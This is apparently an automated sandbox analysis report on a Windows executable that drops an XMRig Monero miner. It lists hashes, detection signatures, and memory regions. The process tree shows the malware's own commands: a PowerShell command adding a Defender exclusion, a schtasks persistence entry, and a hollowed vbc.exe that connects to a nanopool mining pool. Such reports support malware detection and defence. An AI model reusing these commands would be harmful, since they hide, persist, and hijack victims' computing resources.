Analysis

  • max time kernel
    100s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2023, 09:34

General

  • Target

    8a1b6bcbecc7ff5bcd2e91d5f8cb2a96a6bba877a0a3c4cfad30040aa485683d.exe

  • Size

    1.9MB

  • MD5

    9730d3778f3d91f877d136d308d9e26d

  • SHA1

    4b7189034491ce3bb42e60c9e0d9be816bec396f

  • SHA256

    8a1b6bcbecc7ff5bcd2e91d5f8cb2a96a6bba877a0a3c4cfad30040aa485683d

  • SHA512

    69951af0e67a90f38ce8aab64465e27b4489d914998b01fe46112768e229fccb4c10bacd0574aa62df9da6ae0e5ef179dffa58a0c959b95fcba61dff839109e3

  • SSDEEP

    49152:ZZ/4vWR1es2daoAoXkg39vQ5ytNFu+Al89MmB+SkS:ZV4OR1eHhXdtNFu+A2Wsfk

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8a1b6bcbecc7ff5bcd2e91d5f8cb2a96a6bba877a0a3c4cfad30040aa485683d.exe
    "C:\Users\Admin\AppData\Local\Temp\8a1b6bcbecc7ff5bcd2e91d5f8cb2a96a6bba877a0a3c4cfad30040aa485683d.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:540
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CARWD" /tr "C:\ProgramData\Package\CARWD.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CARWD" /tr "C:\ProgramData\Package\CARWD.exe"
        3⤵
        • Creates scheduled task(s)
        PID:444
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1556

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqfqmmq5.tzu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/540-166-0x000001FBFE2F0000-0x000001FBFE300000-memory.dmp

    Filesize

    64KB

  • memory/540-164-0x000001FBFE2F0000-0x000001FBFE300000-memory.dmp

    Filesize

    64KB

  • memory/540-165-0x000001FBFE2F0000-0x000001FBFE300000-memory.dmp

    Filesize

    64KB

  • memory/540-163-0x000001FBFE2A0000-0x000001FBFE2C2000-memory.dmp

    Filesize

    136KB

  • memory/1556-377-0x0000027DB4900000-0x0000027DB4920000-memory.dmp

    Filesize

    128KB

  • memory/1556-376-0x0000027DB2F00000-0x0000027DB2F20000-memory.dmp

    Filesize

    128KB

  • memory/1556-372-0x0000027DB4900000-0x0000027DB4920000-memory.dmp

    Filesize

    128KB

  • memory/1556-370-0x0000027DB2F00000-0x0000027DB2F20000-memory.dmp

    Filesize

    128KB

  • memory/1556-305-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1556-273-0x0000027DB48C0000-0x0000027DB4900000-memory.dmp

    Filesize

    256KB

  • memory/1556-267-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/2036-178-0x00007FF9C50F0000-0x00007FF9C518E000-memory.dmp

    Filesize

    632KB

  • memory/2036-188-0x00007FF9B6860000-0x00007FF9B6876000-memory.dmp

    Filesize

    88KB

  • memory/2036-150-0x0000000003380000-0x0000000003390000-memory.dmp

    Filesize

    64KB

  • memory/2036-149-0x00007FF9A4D20000-0x00007FF9A4E6E000-memory.dmp

    Filesize

    1.3MB

  • memory/2036-148-0x0000000000E70000-0x0000000001042000-memory.dmp

    Filesize

    1.8MB

  • memory/2036-147-0x00007FF9C38A0000-0x00007FF9C38CB000-memory.dmp

    Filesize

    172KB

  • memory/2036-145-0x00007FF9A6470000-0x00007FF9A6F31000-memory.dmp

    Filesize

    10.8MB

  • memory/2036-170-0x00007FF9C5790000-0x00007FF9C5985000-memory.dmp

    Filesize

    2.0MB

  • memory/2036-171-0x00007FF9C5030000-0x00007FF9C50EE000-memory.dmp

    Filesize

    760KB

  • memory/2036-172-0x00007FF9C3470000-0x00007FF9C3739000-memory.dmp

    Filesize

    2.8MB

  • memory/2036-173-0x00007FF9C3740000-0x00007FF9C37DD000-memory.dmp

    Filesize

    628KB

  • memory/2036-174-0x00007FF9C3280000-0x00007FF9C3380000-memory.dmp

    Filesize

    1024KB

  • memory/2036-177-0x00007FF9C37F0000-0x00007FF9C389C000-memory.dmp

    Filesize

    688KB

  • memory/2036-179-0x00007FF9C5310000-0x00007FF9C543A000-memory.dmp

    Filesize

    1.2MB

  • memory/2036-135-0x0000000003260000-0x00000000032A3000-memory.dmp

    Filesize

    268KB

  • memory/2036-180-0x00007FF9A8330000-0x00007FF9A8395000-memory.dmp

    Filesize

    404KB

  • memory/2036-181-0x00007FF9C4440000-0x00007FF9C4795000-memory.dmp

    Filesize

    3.3MB

  • memory/2036-182-0x00007FF9C4120000-0x00007FF9C41ED000-memory.dmp

    Filesize

    820KB

  • memory/2036-183-0x00007FF9A80C0000-0x00007FF9A816A000-memory.dmp

    Filesize

    680KB

  • memory/2036-184-0x00007FF9C3930000-0x00007FF9C3985000-memory.dmp

    Filesize

    340KB

  • memory/2036-186-0x00007FF9B5CF0000-0x00007FF9B5CFA000-memory.dmp

    Filesize

    40KB

  • memory/2036-151-0x00007FF9C2F60000-0x00007FF9C2F87000-memory.dmp

    Filesize

    156KB

  • memory/2036-187-0x00007FF9A6470000-0x00007FF9A6F31000-memory.dmp

    Filesize

    10.8MB

  • memory/2036-190-0x00007FF9C4F00000-0x00007FF9C502A000-memory.dmp

    Filesize

    1.2MB

  • memory/2036-189-0x00007FF9A8000000-0x00007FF9A80BD000-memory.dmp

    Filesize

    756KB

  • memory/2036-191-0x00007FF9A4D20000-0x00007FF9A4E6E000-memory.dmp

    Filesize

    1.3MB

  • memory/2036-192-0x00007FF9C2F60000-0x00007FF9C2F87000-memory.dmp

    Filesize

    156KB

  • memory/2036-193-0x0000000000E70000-0x0000000001042000-memory.dmp

    Filesize

    1.8MB

  • memory/2036-194-0x0000000003260000-0x00000000032A3000-memory.dmp

    Filesize

    268KB

  • memory/2036-195-0x0000000003380000-0x0000000003390000-memory.dmp

    Filesize

    64KB

  • memory/2036-223-0x00007FF9A7F40000-0x00007FF9A7F75000-memory.dmp

    Filesize

    212KB

  • memory/2036-224-0x00007FF9A2180000-0x00007FF9A2282000-memory.dmp

    Filesize

    1.0MB

  • memory/2036-225-0x00007FF9C3990000-0x00007FF9C39FB000-memory.dmp

    Filesize

    428KB

  • memory/2036-226-0x00007FF9C2280000-0x00007FF9C22BB000-memory.dmp

    Filesize

    236KB

  • memory/2036-228-0x00007FF9C5790000-0x00007FF9C5985000-memory.dmp

    Filesize

    2.0MB

  • memory/2036-146-0x0000000003260000-0x00000000032A3000-memory.dmp

    Filesize

    268KB

  • memory/2036-143-0x00007FF9C4290000-0x00007FF9C4431000-memory.dmp

    Filesize

    1.6MB

  • memory/2036-144-0x0000000000E70000-0x0000000001042000-memory.dmp

    Filesize

    1.8MB

  • memory/2036-142-0x00007FF9A8000000-0x00007FF9A80BD000-memory.dmp

    Filesize

    756KB

  • memory/2036-141-0x00007FF9C0DD0000-0x00007FF9C0DE2000-memory.dmp

    Filesize

    72KB

  • memory/2036-375-0x0000000000E70000-0x0000000001042000-memory.dmp

    Filesize

    1.8MB

  • memory/2036-140-0x00007FF9C50F0000-0x00007FF9C518E000-memory.dmp

    Filesize

    632KB

  • memory/2036-139-0x00007FF9A80C0000-0x00007FF9A816A000-memory.dmp

    Filesize

    680KB